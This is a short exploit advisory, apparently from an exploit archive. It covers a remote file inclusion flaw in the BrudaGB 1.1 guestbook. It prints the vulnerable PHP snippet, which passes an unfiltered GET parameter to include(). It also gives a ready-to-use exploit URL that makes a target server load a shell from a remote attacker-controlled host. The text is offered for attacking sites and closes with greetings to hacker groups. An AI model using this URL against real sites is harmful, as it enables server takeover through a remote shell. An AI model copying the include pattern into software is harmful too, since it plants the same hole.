id: 889
date: 09/25/2006
title: BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability
author: SHiKaA
cves: 

==================================================================
BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability
==================================================================


#==============================================================================================
#BrudaGB <= v1.1 (o) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================================
#
#Example : http://www.brudaswen.de/scripts/BrudaGB_v11/
#
#================================================================================================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
 <?
 if($_GET[o] != "")
 {
 include($_GET[o].".php");
  }
 BrudaNews();
   ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================



#  0day.today [2023-03-24]  #